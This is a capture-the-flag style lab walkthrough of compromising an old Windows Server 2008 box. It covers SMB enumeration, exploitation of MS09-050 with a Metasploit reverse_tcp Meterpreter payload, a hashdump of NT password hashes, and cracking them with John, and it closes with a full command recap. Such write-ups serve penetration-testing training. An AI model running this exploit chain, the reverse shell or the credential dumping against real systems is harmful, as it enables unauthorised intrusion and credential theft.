VulnSrv | Windows
Difficulty: Easy–Medium
Tags: SMB, RCE, metasploit, hashdump, password cracking
Tools Used: Nmap, smbmap, Metasploit, John the Ripper

This one’s straight out of the OSCP classics playbook—an aging Windows Server leaking vulnerabilities from 2009, wide open SMB ports, and a textbook Meterpreter drop through MS09-050. We'll walk through identifying this RCE vector, exploiting it with Metasploit, and cracking dumped hashes with John for some post-ex creds. Tight, fast, and brutal.

Initial Enumeration

We always start wide. A targeted scan is fine once you've mapped your perimeter, but for OSCP-style machines, go full TCP and script-assisted first.

nmap -sC -sV --open <target_IP>

Here’s what came back:

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Windows Server 2008 R2 Standard 7601 Service Pack 1
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
5357/tcp  open  httpapi       Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152/tcp open  msrpc
49153/tcp open  msrpc
49154/tcp open  msrpc
49155/tcp open  msrpc
49156/tcp open  msrpc
49157/tcp open  msrpc
49158/tcp open  msrpc

Seeing 139 and 445 open on an older Windows box (confirmed: Server 2008 SP1) immediately rang alarm bells. These versions are notoriously vulnerable to SMBv2-based remote code execution—especially when no domain hardening or patch hygiene is in place.

SMB Enumeration

SMB was the clear priority. We tested for share enumeration:

smbclient -L //<target_IP> --no-pass
smbmap -H <target_IP>

No dice. No anonymous shares, no accessible drives. Not uncommon—admins sometimes remember to lock the front door. But this box left the windows open. So I pushed forward with a vuln check.

nmap --script smb-vuln* -p 445 <target_IP>

Jackpot:

VULNERABLE:  
MS09-050: SMBv2 Remote Code Execution
State: VULNERABLE  
...

This is CVE-2009-3103 — a classic buffer overflow in SMBv2 that affects Windows Vista and Server 2008 when handling malformed SMB negotiation requests. No authentication required. It’s remote shell with zero friction. In 2009, it wrecked networks. In 2025, it still shows up in CTF labs and unpatched legacy systems. That tells you everything about security debt.

User Flag

Time to weaponize.

I fired up Metasploit, locked in the exploit, and set my parameters:

msfconsole
use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
set RHOSTS <target_IP>
set LPORT 9999
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <your_VPN_IP>
run

First attempt? Dead air.

Rookie mistake—I had LHOST set to my local 192 IP, not the VPN tunnel (tun0). Always check your interface:

ip a | grep tun0

Corrected that:

set LHOST <tun0_IP>

Second attempt? Boom.

[*] Meterpreter session 1 opened.

And just like that, we're in.

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Full SYSTEM access on connect. No need to escalate. A direct injection straight into the kernel space.

Flag was right where you'd expect:

meterpreter > search -f proof.txt
Found: C:\Users\Administrator\Desktop\proof.txt
meterpreter > cat C:\Users\Administrator\Desktop\proof.txt

User flag captured.

Post-Exploitation: Hashdump and Cracking

We didn’t need to escalate, but the engagement doesn’t end at SYSTEM. Post-ex is where you squeeze out real value—lateral movement, persistence, credentials, and tokens.

meterpreter > hashdump

Returned:

aaron:1002:505a9279cfd2f94c658980551cfde735
Administrator:500:848c583ff88fae9eb8c40e05e3bed204
jack:1003:e24106942bf38bcf57a6a4b29016eff6
niky:1000:e99eaad9ebc48c3bd0c9734d0c6d106b
tim:1001:4c67a94ab3de7684d00a941fae71f966

Saved to hashes.txt and passed to John:

john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

Recovered:

aaron: blue
jack: aaa
niky: niky

These passwords are comically weak. Rockyou.txt gets a lot of hate for being overused, but this is why it’s still the go-to for OSCP and real-world low-hanging fruit. Passwords like “blue” and “aaa” have a nasty habit of showing up in SMB, RDP, and even MySQL logins on multi-tier environments.

In a real pentest, you'd dump creds like these into CrackMapExec or use them for lateral RDP pivoting. Here, it’s a strong post-ex proof that credential harvesting still pays off.

Summary / Review

This box was OSCP comfort food: familiar ports, a juicy vuln, and an immediate payoff.

We started with full TCP recon, honed in on the SMB stack, and spotted MS09-050 like a red flare in the night. Exploiting it with Metasploit was simple once LHOST was set right. The SYSTEM shell was instant. No escalation required.

Post-ex filled in the rest: hashdump and crack, with real creds in hand.

Takeaways:

1. Set your LHOST to the correct interface. Every time.

2. Never underestimate SMB—especially on legacy systems.

3. Post-ex matters. Creds recovered now = shells later.

This is the kind of box that builds confidence, reminds you why enumeration matters, and keeps your reflexes sharp.

Command Recap

nmap -sC -sV --open <target_IP>  
smbclient -L //<target_IP> --no-pass  
smbmap -H <target_IP>  
nmap --script smb-vuln* -p 445 <target_IP>  
msfconsole  
use exploit/windows/smb/ms09_050_smb2_negotiate_func_index  
set RHOSTS <target_IP>  
set LHOST <tun0 IP>  
set LPORT 9999  
set PAYLOAD windows/meterpreter/reverse_tcp  
run  
getuid  
search -f proof.txt  
cat C:\Users\Administrator\Desktop\proof.txt  
hashdump  
john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

Final Thoughts

Old CVEs never die—they just get rediscovered by new attackers. If you see a Windows Server 2008 box with SMB exposed, assume it’s bleeding until proven otherwise. And if they left MS09-050 unpatched, odds are they’ve got more skeletons buried nearby.

Cracked creds. Remote SYSTEM. No privesc needed.
Another one rooted. On to the next.